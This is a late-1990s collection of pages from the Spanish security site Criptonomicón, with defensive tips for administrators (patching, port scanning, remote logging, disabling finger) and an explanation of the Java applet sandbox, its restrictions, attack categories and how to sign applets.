visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/sombra.html [25/10/2000 02:31:34 p.m.]

Actualizar y configurar

Consejos para
administradores
Consejos para
usuarios

Actualizar y configurar
Sabas cul es la causa principal de los ataques con xito a los sistemas infomticos?
Versiones sin actualizar. S, la utilizacin de una versin del programa que sea que
no ha sido actualizada en meses, a veces incluso en aos. Me refiero a software tanto
en pequeas mquinas personales (cuntos de los que estis leyendo este boletn
usis una versin de Netscape o Explorer anterior a la 4.x?) hasta el software de red
de grandes mquinas Unix o servidores NT, software al que no se la han aplicado los
parches pertinentes, o bien que no se ha actualizado convenientemente con la ltima
versin disponible por el fabricante.
Por lo tanto, si deseas disminuir los riesgos a los que se expone tu sistema, ya sea un
modesto PC en casa o un gran ordenador de la Administracin, es muy importante
que revises el software que utiliza, especialmente aquel que tenga que ver con la
conectividad a Internet, administracin de servicios de Red, etc., y lo actualices o
parchees con las ltimas actualizaciones disponibles.
A menudo no resulta una buena idea utilizar la ltima versin, sino la anteltima, ya
que al ritmo trepidante al que se lanzan nuevas versiones de productos (este lunes
Netscape anunci la beta del Communicator 5.0), la ltima y flamante versin, con
posibles despliegues de nuevas funcionalidades e interfaces psicodlicos, con toda
seguridad no habr sido puesta a prueba en su fase de diseo ni ha sido
suficientemente validada por la comunidad de usuarios. A veces ms vale esperar,
aunque eso s, no con la primera versin del producto.
Por ltimo, no basta con instalar la versin ms reciente. Es igualmente configurarla
correctamente, de manera que se cierren los resquicios que puedan dejar las
instalaciones por defecto. Esta correcta configuracin es importante no slo en los
sistemas operativos (ver la noticia 5. Nuevo agujero en NT 4 en este boletn) sino
tambin en el software en general (por ejemplo, ya sabemos que los navegadores
incorporan por defecto una poltica de seguridad muy dbil).
En definitiva, se trata de mucho trabajo aadido, en la medida en que exige
mantenerse al da de la evolucin de los productos, as como conocerlos a fondo para
poder configurarlos correctamente. Nadie dijo que la seguridad fuera cosa de nios.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/actualizar.html (1 of 2) [25/10/2000 02:31:35 p.m.]

Actualizar y configurar

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/actualizar.html (2 of 2) [25/10/2000 02:31:35 p.m.]

Escaneo de puertos

Consejos para
administradores
Consejos para
usuarios

Escaneo de puertos
Los servicios TCP/IP, como la Web o Ftp, permanecen a la escucha de un
puerto determinado. La funcin de un escaneador de puertos consiste en
escanear un rango de direcciones IP en busca de servicios a la escucha en
algn puerto. En una gran red puede ser posible que existan servicios
ilegales escuchando en algn puerto poco frecuente, de manera que algn
trabajador utilice la red corporativa para montar su propio servidor Web o
servidor de ficheros, sin pagar a un proveedor de servicios.
Para detectar este tipo de abusos, que pueden llegar a comprometer
seriamente la seguridad o ser el resultado de un ataque previo, conviene
correr de vez en cuando un escaneador de puertos como UltraScan o Saint.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/puertos.html [25/10/2000 02:31:35 p.m.]

Conservar las huellas de los intrusos

Consejos para
administradores
Consejos para
usuarios

Conservar las huellas de los intrusos


La mayora de los sistemas mantienen una serie de registros de log, donde queda
almacenada la actividad de los usuarios, procesos, conexiones, etc. Si un intruso
penetrara en nuestro sistema, siempre dejar alguna huella en el mismo, que nos
permitir rastrear sus pasos. Por este motivo, los intrusos ms sofisticados contarn
con herramientas para borrar silenciosamente toda traza de su incursin. Si quieres
que se vuelva imposible para un atacante borrar sus huellas, puedes redirigir la salida
de los ficheros de log a otra mquina de tu sistema, de manera que se dificulte la
labor de borrado de rastro de los atacantes. Para ello debes modificar adecuadamente
el fichero syslog.conf o similar, indicando que debe reenviar a otra/s mquina/s los
mensajes deseados.
Para una mayor seguridad, se pueden redirigir a una impresora, de manera que
queden registrados en papel. Si te asusta el volumen de papel que se podra generar,
puedes adoptar otra solucin igual de eficaz, como redirigir el fichero a un puerto
serie y conectar ah mediante un cable modem nulo alguna vieja mquina que ya
nadie utilice, guardando en su disco los ficheros.
Para cazar a un intruso, nada como conservar bien seguros todos sus pasos por
nuestro sistema.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/intrusos.html [25/10/2000 02:31:35 p.m.]

Cmo controlar por dnde navegan los usuarios

Consejos para
administradores
Consejos para
usuarios

Cmo controlar por dnde navegan los


usuarios
Si eres padre de algn nio, jefe de un grupo de empleados o educador con jvenes
bajo tu tutela, puede que te preocupe saber por dnde navegan las personas a tu
cargo, qu contenidos ven y si son convenientes. Si quieres controlar el uso que esas
personas hacen del navegador instalado en los ordenadores de tu sistema, puedes
activar el asistente de contenidos.
En Internet Explorer, debes acudir a:
Ver --> Opciones de Internet... --> Contenido --> Restricciones --> Activar
En Netscape Communicator 4.5, se hace pulsando el comando NetWatch del men
Ayuda.
Una vez dentro, no tienes ms que seguir las instrucciones para activar las
restricciones que se impondrn sobre los contenidos que a partir de este momento se
podr visualizar en tu ordenador.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/control.html [25/10/2000 02:31:35 p.m.]

Dedos acusadores

Consejos para
administradores
Consejos para
usuarios

Dedos acusadores
Cuando se utiliza el servicio de finger para interrogar a un servidor, a menudo ste
revela ms informacin sobre s mismo y sus usuarios de la que sera deseable: el
shell que est utilizando cada usuario, su directorio base y grupo a que pertenece, su
nombre de usuario, a menudo acompaado del nombre real y de su nmero de
telfono y direccin. Debido a que adems suele proporcionar informacin sobre la
hora del ltimo login, un atacante podra confeccionar patrones de trabajo de los
distintos usuarios.
En definitiva, se trata de mucha informacin valiosa como para distribuirla
alegremente. Piensa si realmente resulta til que esa informacin est disponible para
cualquier usuario de Internet o si convendra mejor eliminar ese servicio de finger.
Participa con tus consejos y trucos
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/consejos/finger.html [25/10/2000 02:31:35 p.m.]

Cmo firmar applets de Java

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Lneas futuras

Consejos

Recursos

Cmo firmar applets de Java


En vista de las restricciones impuestas por el modelo de seguridad Pasos generales
de Java, muchos desarrolladores de software se encuentran ante la
impotencia de escribir aplicaciones realmente tiles, puesto que se Internet Explorer
les niega la capacidad de leer/escribir en disco o de abrir
conexiones a otras mquinas. Si se quiere que las applets sean
Netscape
algo ms que dibujos animados para realzar el impacto visual de
una pgina y lleguen a convertirse en verdaderas aplicaciones
Inconvenientes
productivas y realmente tiles, los usuarios de la aplicacin Java
necesitan garantizarle el acceso a los recursos, y antes de
Comparacin
concederle estos privilegios, necesitan de un mecanismo que les
permita saber de dnde (de quin) proviene la applet a la que le van a permitir acceso
a su sistema.
En esta seccin se explicar la forma prctica de firmar applets, para que se puedan
ejecutar sin restricciones en el sistema del usuario, siempre y cuando ste confe en el
autor que firma la applet.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/firmas.html [25/10/2000 02:31:36 p.m.]

Seguridad en Java

Suscripcin gratis

Intimidad?

Seguridad en Java
Artculos

Seguridad

Linux

Navegacin segura

Control de acceso

CGI

Java

JavaScript

Cookies

Crashes

Por qu tanto revuelo acerca de la seguridad en Java? Por qu


no se habla con la misma aprensin de seguridad en C o seguridad
en Fortran?
La respuesta no es difcil de entender: los programas en C, por
ejemplo, estn compilados para una arquitectura determinada (un
programa compilado para Unix no funciona en Mac o en
Windows) y es el usuario el que los ejecuta en su ordenador (bien
descargados desde la Red, desde un diskete o un CD-ROM) bajo
su entera responsabilidad y sabiendo cundo los ejecuta.

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Lneas futuras

Sin embargo, la caracterstica ms atractiva de Java desde el punto Cmo firmar applets
de vista de Internet, sus applets, que se pueden ejecutar en
cualquier plataforma con cualquier sistema operativo, constituyen
Consejos
tambin su taln de Aquiles. Si desde cualquier pgina Web que
visitamos nos pueden enviar una applet que se ejecute en nuestro
Recursos
ordenador sin nuestro conocimiento, todo tipo de ataques podra
tener lugar: esas applets podran cifrar el contenido de nuestro
disco duro y luego su autor pedirnos una suma millonaria por entregarnos la clave;
podran introducirnos virus; podran robar todo tipo de informacin de nuestro
ordenador; podran explotar recursos de nuestro sistema, como ciclos de CPU, y un
largo etctera fcil de imaginar.

Agujeros

Spam

Con el fin de que estos escenarios no fueran posibles, se implement un sistema de


seguridad integrado por cuatro lneas de defensa. A lo largo de estas pginas iremos
describiendo los ataques y las formas de defensa, veremos qu son y cmo se
escriben applets hostiles y cmo protegernos de ellos.

Remailers

Anonimato
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Correo seguro

Web seguro

Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

Susurros desde la Cripta

file:///C|/TEMP/criptonomicon/criptonomicon/java/java.html (1 of 2) [25/10/2000 02:31:36 p.m.]

Seguridad en Java
Consejos prcticos

Referencias

Libro de Visitas

file:///C|/TEMP/criptonomicon/criptonomicon/java/java.html (2 of 2) [25/10/2000 02:31:36 p.m.]

Caractersticas del lenguaje Java

Barreras de seguridad

Prohibido

Caractersticas del lenguaje Java

Agujeros

Lenguaje simple

Lneas futuras

Java posee una curva de aprendizaje muy rpida. Resulta


relativamente sencillo escribir applets interesantes desde el principio. Todos aquellos
familiarizados con C++ encontrarn que Java es ms sencillo, ya que se han
eliminado ciertas caractersticas, como los punteros. Debido a su semejanza con C y
C++, y dado que la mayora de la gente los conoce aunque sea de forma elemental,
resulta muy fcil aprender Java. Los programadores experimentados en C++ pueden
migrar muy rpidamente a Java y ser productivos en poco tiempo.

Cmo firmar applets

Consejos

Recursos

Caractersticas de
Java
Cmo funciona

Orientado a objetos
Java fue diseado como un lenguaje orientado a objetos desde el principio. Los
objetos agrupan en estructuras encapsuladas tanto sus datos como los mtodos (o
funciones) que manipulan esos datos. La tendencia del futuro, a la que Java se suma,
apunta hacia la programacin orientada a objetos, especialmente en entornos cada
vez ms complejos y basados en red.

Distribuido
Java proporciona una coleccin de clases para su uso en aplicaciones de red, que
permiten abrir sockets y establecer y aceptar conexiones con servidores o clientes
remotos, facilitando as la creacin de aplicaciones distribuidas.

Interpretado y compilado a la vez


Java es compilado, en la medida en que su cdigo fuente se transforma en una
especie de cdigo mquina, los bytecodes, semejantes a las instrucciones de
ensamblador.
Por otra parte, es interpretado, ya que los bytecodes se pueden ejecutar directamente
sobre cualquier mquina a la cual se hayan portado el intrprete y el sistema de
ejecucin en tiempo real (run-time).

file:///C|/TEMP/criptonomicon/criptonomicon/java/quesjava.html (1 of 3) [25/10/2000 02:31:37 p.m.]

Caractersticas del lenguaje Java

Robusto
Java fue diseado para crear software altamente fiable. Para ello proporciona
numerosas comprobaciones en compilacin y en tiempo de ejecucin. Sus
caractersticas de memoria liberan a los programadores de una familia entera de
errores (la aritmtica de punteros), ya que se ha prescindido por completo los
punteros, y la recoleccin de basura elimina la necesidad de liberacin explcita de
memoria.

Seguro (?)
Dada la naturaleza distribuida de Java, donde las applets se bajan desde cualquier
punto de la Red, la seguridad se impuso como una necesidad de vital importancia. A
nadie le gustara ejecutar en su ordenador programas con acceso total a su sistema,
procedentes de fuentes desconocidas. As que se implementaron barreras de
seguridad en el lenguaje y en el sistema de ejecucin en tiempo real.

Indiferente a la arquitectura
Java est diseado para soportar aplicaciones que sern ejecutadas en los ms
variados entornos de red, desde Unix a Windows Nt, pasando por Mac y estaciones
de trabajo, sobre arquitecturas distintas y con sistemas operativos diversos. Para
acomodar requisitos de ejecucin tan variopintos, el compilador de Java genera
bytecodes: un formato intermedio indiferente a la arquitectura diseado para
transportar el cdigo eficientemente a mltiples plataformas hardware y software. El
resto de problemas los soluciona el intrprete de Java.

Portable
La indiferencia a la arquitectura representa slo una parte de su portabilidad.
Adems, Java especifica los tamaos de sus tipos de datos bsicos y el
comportamiento de sus operadores aritmticos, de manera que los programas son
iguales en todas las plataformas.
Estas dos ltimas caractersticas se conocen como la Mquina Virtual Java (JVM).

Alto rendimiento
Multihebra
Hoy en da ya se ven como terriblemente limitadas las aplicaciones que slo pueden
ejecutar una accin a la vez. Java soporta sincronizacin de mltiples hilos de
ejecucin (multithreading) a nivel de lenguaje, especialmente tiles en la creacin de
aplicaciones de red distribuidas. As, mientras un hilo se encarga de la comunicacin,
otro puede interactuar con el usuario mientras otro presenta una animacin en
pantalla y otro realiza clculos.

file:///C|/TEMP/criptonomicon/criptonomicon/java/quesjava.html (2 of 3) [25/10/2000 02:31:37 p.m.]

Caractersticas del lenguaje Java

Dinmico
El lenguaje Java y su sistema de ejecucin en tiempo real son dinmicos en la fase de
enlazado. Las clases slo se enlazan a medida que son necesitadas. Se pueden enlazar
nuevos mdulos de cdigo bajo demanda, procedente de fuentes muy variadas,
incluso desde la Red.

Produce applets
Java puede ser usado para crear dos tipos de programas: aplicaciones independientes
y applets.
Las aplicaciones independientes se comportan como cualquier otro programa escrito
en cualquier lenguaje, como por ejemplo el navegador de Web HotJava, escrito
ntegramente en Java.
Por su parte, las applets son pequeos programas que aparecen embebidos en las
pginas Web, como aparecen los grficos o el texto, pero con la capacidad de
ejecutar acciones muy complejas, como animar imgenes, establecer conexiones de
red, presentar mens y cuadros de dilogo para luego emprender acciones, etc.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/quesjava.html (3 of 3) [25/10/2000 02:31:37 p.m.]

El modelo de las cuatro capas de Java

Qu es Java

Prohibido

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

El modelo de las cuatro capas

Modelo de las 4 capas


Lenguaje
Verificador

El modelo de seguridad de Java se conoce como modelo del patio


Cargador
de juegos (Sandbox model), aludiendo a esos rectngulos con
Gestor
arena donde se deja jugando a los nios pequeos, de manera que
puedan hacer lo que quieran dentro del mismo, pero no puedan salir al exterior.

En concreto, este modelo se implementa mediante la construccin de cuatro barreras


o lneas de defensa:
Primera lnea de defensa: Caractersticas del lenguaje/compilador
Segunda lnea de defensa: Verificador de cdigo de bytes
Tercera lnea de defensa: Cargador de clases
Cuarta lnea de defensa: Gestor de Seguridad
Es importante sealar que aunque se hable de barreras de defensa, no se trata de
barreras sucesivas. Es decir, no se trata de que si se traspasa la primera barrera, hay
que superar la segunda, y luego la tercera y por fin la ltima, como muros uno detrs
de otros. Ms bien hay que imaginar una fortaleza con cuatro muros, y basta que se
penetre uno de ellos para que la fortaleza caiga en manos del enemigo. As que ms
que de lneas de defensa, habra que hablar de varios frentes.
En las prximas pginas iremos viendo cada una de ellas en detalle. Empezaremos
con la primera barrera, las caractersticas del lenguaje.

Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/barreras.html [25/10/2000 02:31:38 p.m.]

Restricciones de Seguridad de Java


Restricciones
Sistema de ficheros
Conexiones de red
Acceso al sistema
Manipulacin de threads
Mtodos nativos
Mensajes de alerta
Qu es Java

Barreras de seguridad

Agujeros

Lneas futuras

Cmo firmar applets

Consejos

Recursos

Restricciones de seguridad
En primer lugar, es importante hacer notar que las restricciones son distintas para
cada navegador, ya que cada uno ofrece su propia poltica de seguridad. La poltica
de Netscape Navigator, por ejemplo, es mucho ms restrictiva que la de HotJava de
Sun.
En cualquier caso, la mayora de los navegadores presentarn las siguientes
restricciones a la hora de ejecutar applets:
No se puede trabajar con el sistema de ficheros: leer, escribir, borrar,
renombrar, listar, conseguir informacin, ejecutar programas, etc.
No se pueden establecer conexiones de red a mquinas distintas que la que
envi el applet
No se permite acceso al sistema
No se permite manipulacin de threads
No se pueden cargar mtodos nativos
No se pueden evitar mensajes de alerta en las ventanas creadas por el applet
No se pueden crear subclases de SecurityManager en una applet
No se permiten puertas traseras
Para abreviar, todas las restricciones anteriores pueden reducirse a dos reglas:
No se puede trabajar con ficheros en la mquina del usuario a menos que ste
lo permita
No se puede conectar a nada en la Red ms que a la mquina que envi la

file:///C|/TEMP/criptonomicon/criptonomicon/java/restricciones.html (1 of 2) [25/10/2000 02:31:38 p.m.]

Restricciones de Seguridad de Java

applet
En la prctica, estas restricciones son tan estrictas para las applets descargadas
remotamente que slo pueden acceder los recursos muy limitados disponibles dentro
del patio de juegos, como expresa muy grficamente la siguiente figura tomada de Li
Gong.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/restricciones.html (2 of 2) [25/10/2000 02:31:38 p.m.]

Agujeros de seguridad en Java

Qu es Java

Barreras de seguridad

Prohibido

Lneas futuras

Ataques comunes en Java

Cmo firmar applets

Consejos

Recursos

Existen muchos tipos de ataques a la seguridad que podran


organizarse contra un sistema de ordenadores. Aunque el usuario
medio podra ignorar que tales amenazas existen, lo cierto es que
los ataques suceden, a veces con consecuencias devastadoras. A
continuacin veremos cules son los principales ataques y cmo
Java se defiende (a veces sin xito, tambin lo veremos) contra
ellos.
Entre los ataques ms comunes citaremos:
Robo de informacin
Destruccin de informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao

Ataques
Robo de informacin
Destruccin de
informacin
Robo de recursos
Denegacin de servicio
Enmascaramiento
Engao
Lnea Maginot

Otra clasificaciones de ataques que se pueden encontrar en la literatura ms


relacionada con Java es la siguiente:
Modificacin o alteracin de un sistema o sus recursos.
Denegacin del uso legtimo de los recursos de la mquina.
Ataques a la intimidad del individuo.
Mera molestia.
No resulta complicado establecer una correspondencia entre ambas clasificaciones,
que se deja al ingenio del lector.

file:///C|/TEMP/criptonomicon/criptonomicon/java/agujeros.html (1 of 2) [25/10/2000 02:31:39 p.m.]

Agujeros de seguridad en Java


Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/agujeros.html (2 of 2) [25/10/2000 02:31:39 p.m.]

Lneas futuras en Java

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Cmo firmar applets

Consejos

Recursos

Cul ser el futuro de la seguridad en


Java?
Futuro
Actualmente se trabaja en el API de Seguridad de Java, que tiene
JDK 1.1
como meta el proporcionar servicios de validacin y cifrado para
las aplicaciones Java. Por supuesto, dada la extrema dependencia
JDK 1.2
de la seguridad a lo que se decida en este API, ha surgido una gran
polmica en torno a qu medidas de seguridad adicionales deberan incorporarse.

Un rasgo tpico de que ya gozan las applets es la capacidad de ser firmadas por
alguna autoridad de certificacin. De esta manera, al presentar las applets una firma
digital, el usuario puede decidir si la applet en cuestin es de confianza o no. Las
applets seguras tendrn el privilegio de acceder de forma controlada a los recursos,
mientras que al resto de las applets se les negar como hasta ahora. Puedes encontrar
ms informacin en el captulo sobre cmo firmar applets de Java.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/futuro.html [25/10/2000 02:31:39 p.m.]

Recomendaciones de Seguridad en Java

Recomendaciones de Seguridad en Java


Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Lneas futuras

Cmo firmar applets

Recursos

Navega siempre con la ltima versin de software


Desactiva Java y conctalo slo en aquellos sitios Web de los que puedas
fiarte, porque su reputacin es conocida
Conoce el entorno Java de tu navegador, no sea que est manipulado
Utiliza compiladores de fuentes fiables
Utiliza bibliotecas de Java de fuentes fiables
Utiliza ofuscadores de cdigo para ocultar el cdigo fuente
Navega annimamente
Aunque te parezca fuera de lugar, mantn copias de seguridad de todo lo que
sea de importancia en tu sistema
Nunca ejecutes el navegador desde una mquina que almacene informacin
sensible o sea crtica para el sistema (como un servidor, por ejemplo)

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/recomendaciones.html [25/10/2000 02:31:40 p.m.]

Recursos sobre Seguridad en Java

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Lneas futuras

Recursos sobre Seguridad en Java

Articles about Java Security

Prcticas sobre criptografa en Java

Denial of service

Frequently Asked Questions - Applet Security - La FAQ de Sun, dedicada ms


bien a HotJava y para la versin 1.1 del JDK, aunque aprovecha a todos
Excite Search Results: Java vs Javascript

Hostile Applets Home Page

Java Security

Java security bugs

Java Security: Frequently Asked Questions

JAVA SECURITY FLAWS

Java Security Resources

Java Security Issues

Secure Internet Programming: Java Security: From HotJava to Netscape and


Beyond

The Java Security Hotlist

WWW Security FAQ: Client Side Security

Netscape's Java Security Architecture

Yahoo! - Computers and Internet:Programming Languages:Java:Security

El grupo de news de Usenet comp.lang.java.security

Cmo firmar applets

Consejos

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.

file:///C|/TEMP/criptonomicon/criptonomicon/java/recursos.html (1 of 2) [25/10/2000 02:31:40 p.m.]

Recursos sobre Seguridad en Java


Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/recursos.html (2 of 2) [25/10/2000 02:31:40 p.m.]

Cmo firmar applets de Java

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Lneas futuras

Consejos

Recursos

Pasos generales para firmar applets


Desgraciadamente, dependiendo del tipo de navegador para el que
se escriba el applet, se utilizarn una serie de herramientas
distintas, as como diferentes procesos para garantizar que el
navegador sea capaz de interpretar correctamente la firma y
garantizar los permisos oportunos. Por este motivo, applets
firmadas para Microsoft Internet Explorer no se visualizarn en
Netscape Communicator y viceversa.
No obstante, en todos los casos, el proceso de firmado sigue unas
pautas comunes, descritas de manera general en los siguientes
pasos:

Pasos generales

Internet Explorer

Netscape

Inconvenientes

Comparacin

Paso 1: Crear un certificado para firmar applets


El primer paso consiste en asegurar una identidad bajo la cual se pretende firmar el
cdigo. Para ello se debe obtener una pareja de claves, pblica y privada, y conseguir
que una autoridad de certificacin (AC) extienda un certificado de publicacin de
software. De esta forma, con la clave privada, se puede firmar el cdigo que se
escriba, y gracias al certificado, que contiene la clave pblica, los usuarios de ese
cdigo podrn comprobar con ciertas garantas que no ha sido alterado y que fue
escrito por su autor legtimo.

Paso 2: Empaquetar los ficheros con las clases


Una vez escrito el applet de Java que accede a recursos reservados del sistema, es
necesario compilarlo para obtener los ficheros de clase. Estos ficheros se compactan
y comprimen en nico fichero, que ser el que se firme. Gracias a este enfoque, se
reduce drsticamente el tiempo de descarga del applet a travs de Internet, ya que en
vez de descargar cada fichero de clase por separado (abriendo conexiones
independientes para cada una) se descarga de una sola vez y adems comprimido, y
por otro lado se evita as el tener que firmar todos los ficheros individualmente.

Paso 3: Firmar el fichero empaquetado


Una vez que se dispone de un nico fichero con el cdigo del applet, se firma
utilizando las herramientas adecuadas, de manera que el usuario puede comprobar la
identidad de quien escribi el cdigo del applet y que no fue modificado.
file:///C|/TEMP/criptonomicon/criptonomicon/java/pasos.html (1 of 2) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

Paso 4: Incrustar el cdigo firmado en la pgina Web


Por ltimo, ya slo resta aadir las etiquetas HTML necesarias para que el applet
aparezca en la pgina web en el lugar deseado. En funcin del navegador, estas
etiquetas diferirn muy ligeramente de la etiqueta <applet> convencional.

Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.

file:///C|/TEMP/criptonomicon/criptonomicon/java/pasos.html (2 of 2) [25/10/2000 02:31:41 p.m.]

Cmo firmar applets de Java

Qu es Java

Barreras de seguridad

Prohibido

Agujeros

Lneas futuras

Consejos

Recursos

Cmo firmar applets para Internet


Explorer
Resulta necesario tener instalado el Kit de Desarrollo de Software
de Microsoft (Microsoft Software Development Kit, SDK) para
Java 3.1. La ventaja de la creacin de applets firmados para
Internet Explorer es que no se necesita aadir cdigo especial al
fichero fuente del applet, ni realizar llamadas a funciones
criptogrficas. Para firmar cualquier applet no se requiere
modificarlo en absoluto.
Una vez que se dispone de las herramientas necesarias, se puede
proceder a firmar applets siguiendo los siguientes pasos:

Pasos generales

Internet Explorer

Netscape

Inconvenientes

Comparacin

Paso 1: Crear un certificado para firmar applets


En el caso de Microsoft se necesita un certificado adecuado para su modelo de
Authenticode. Existen muchas autoridades de certificacin que distribuyen tales
certificados, como VeriSign. Para uso personal se debe solicitar un certificado de
clase 2 (al precio de unas 3000 pesetas al ao), mientras que para uso comercial se
necesita uno de clase 3 (que cuesta unas 60000 pesetas anuales).
Dado que el propsito de este artculo es experimentar con las firmas y no vender ni
distribuir software firmado, el lector interesado puede conformarse con un certificado
de prueba, que es gratis y se puede obtener a partir de las propias herramientas del
SDK para Java.
En el directorio \bin\PackSign se encuentran las herramientas en lnea de comandos
que crearn un certificado de prueba. Por ejemplo, si se quiere crear un certificado
para Gonzalo del CSIC, se har lo siguiente:
makecert -sk claveGonzalo -n CN=CSIC Gonzalo.cert
